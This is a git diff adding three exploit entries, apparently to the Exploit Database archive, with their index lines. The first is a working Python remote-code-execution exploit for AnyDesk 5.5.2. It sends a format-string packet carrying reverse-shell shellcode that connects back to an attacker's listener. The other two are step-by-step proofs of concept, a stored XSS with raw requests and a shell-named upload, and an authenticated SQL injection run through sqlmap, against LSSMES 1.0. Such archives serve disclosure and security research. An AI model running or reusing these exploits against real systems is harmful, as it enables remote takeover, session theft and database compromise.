diff --git a/exploits/linux/remote/49613.py b/exploits/linux/remote/49613.py
new file mode 100755
index 000000000..13bc55d78
--- /dev/null
+++ b/exploits/linux/remote/49613.py
@@ -0,0 +1,50 @@
+# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
+# Date: 09/06/20
+# Exploit Author: scryh
+# Vendor Homepage: https://anydesk.com/en
+# Version: 5.5.2
+# Tested on: Linux
+# Walkthrough: https://devel0pment.de/?p=1881
+
+#!/usr/bin/env python
+import struct
+import socket
+import sys
+
+ip = '192.168.x.x'
+port = 50001
+
+def gen_discover_packet(ad_id, os, hn, user, inf, func):
+ d = chr(0x3e)+chr(0xd1)+chr(0x1)
+ d += struct.pack('>I', ad_id)
+ d += struct.pack('>I', 0)
+ d += chr(0x2)+chr(os)
+ d += struct.pack('>I', len(hn)) + hn
+ d += struct.pack('>I', len(user)) + user
+ d += struct.pack('>I', 0)
+ d += struct.pack('>I', len(inf)) + inf
+ d += chr(0)
+ d += struct.pack('>I', len(func)) + func
+ d += chr(0x2)+chr(0xc3)+chr(0x51)
+ return d
+
+# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
+shellcode = b""
+shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
+shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xcb\x46\x40"
+shellcode += b"\x6c\xed\xa4\xe0\xfb\x48\x31\x58\x27\x48\x2d"
+shellcode += b"\xf8\xff\xff\xff\xe2\xf4\xa1\x6f\x18\xf5\x87"
+shellcode += b"\xa6\xbf\x91\xca\x18\x4f\x69\xa5\x33\xa8\x42"
+shellcode += b"\xc9\x46\x41\xd1\x2d\x0c\x96\xf8\x9a\x0e\xc9"
+shellcode += b"\x8a\x87\xb4\xba\x91\xe1\x1e\x4f\x69\x87\xa7"
+shellcode += b"\xbe\xb3\x34\x88\x2a\x4d\xb5\xab\xe5\x8e\x3d"
+shellcode += b"\x2c\x7b\x34\x74\xec\x5b\xd4\xa9\x2f\x2e\x43"
+shellcode += b"\x9e\xcc\xe0\xa8\x83\xcf\xa7\x3e\xba\xec\x69"
+shellcode += b"\x1d\xc4\x43\x40\x6c\xed\xa4\xe0\xfb"
+
+print('sending payload ...')
+p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.sendto(p, (ip, port))
+s.close()
+print('reverse shell should connect within 5 seconds')
\ No newline at end of file
diff --git a/exploits/php/webapps/49609.txt b/exploits/php/webapps/49609.txt
new file mode 100644
index 000000000..2e53992ec
--- /dev/null
+++ b/exploits/php/webapps/49609.txt
@@ -0,0 +1,78 @@
+# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-03-03
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
+# Version: v1.0
+# Tested on: Ubuntu
+
+*Steps to Reproduce:*
+1) Login with Admin Credentials and click on the *Person List* button.
+2) Click on the *Add Person* button.
+3) Now add the 'Ba1man' in the input field of *Name* and 'Ba2man' in the input field of *Address *then intercept it with Burp Suite.
+4) Now add the following payload input field of *Name & Address*.
+
+Payload 1: ba1man">
+Payload 2: ba2man">
+
+4) Click On Add
+5) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
+6) XSS payload is triggered.
+7) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
+8) Again XSS payload is triggered
+
+*Proof-of-concept:*
+1) Vulnerable Form Request:
+
+POST /LSSMES/lssems/admin/add-person.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
+Firefox/86.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------366892106534365372313887502624
+Content-Length: 1110
+Origin: http:// localhost
+Connection: close
+Referer: http:// localhost /LSSMES/lssems/admin/add-person.php
+Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
+Upgrade-Insecure-Requests: 1
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="category"
+3
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="name"
+
+*ba1man">*
+
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif"
+Content-Type: image/gif
+GIF8;
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="mobilenumber"
+8524697125
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="address"
+
+*ba1man">*
+
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="city"
+
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="submit"
+-----------------------------366892106534365372313887502624--
+
+
+2.1) Response:
+Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
+Note: XSS from name parameter
+
+
+2.2) Response:
+Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
+Note: XSS from address parameter
\ No newline at end of file
diff --git a/exploits/php/webapps/49610.txt b/exploits/php/webapps/49610.txt
new file mode 100644
index 000000000..470434a7d
--- /dev/null
+++ b/exploits/php/webapps/49610.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)
+# Date: 2021-03-02
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
+# Version: v1.0
+# Tested on: Ubuntu
+# Detail walkthrough: https://medium.com/@tusharvaidya16/authenticated-blind-error-based-sql-injection-on-local-services-search-engine-management-system-3e99779f0850
+
+*Steps to Reproduce:*
+1) Login with Admin Credentials and click on the *Service Category* button.
+2) Click on the *Manage Category* button.
+3) Now add the double quote ( " ) in the URL after *editid parameter*
+4) At that time we observe that the application is misbehaving now capture this request from the burp suite and save it into an SQL text file.
+4) Now fire up the following command into SQLMAP
+
+CMD: sqlmap -r sql_file.txt --data="editid=1" --curent-db --level 5 --risk 3
+
+4) We got a database.
+
+*Below request from sql_file.txt*
+
+GET /LSSMES/lssems/admin/edit-category-detail.php?editid=* HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
+Firefox/86.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://lcoalhost/LSSMES/lssems/admin/manage-category.php
+Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f94cf2776..883ad68a4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18391,6 +18391,7 @@ id,file,description,date,author,type,platform,port
49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows,
49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,
49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows,
+49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43797,3 +43798,5 @@ id,file,description,date,author,type,platform,port
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php,
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
+49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
+49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,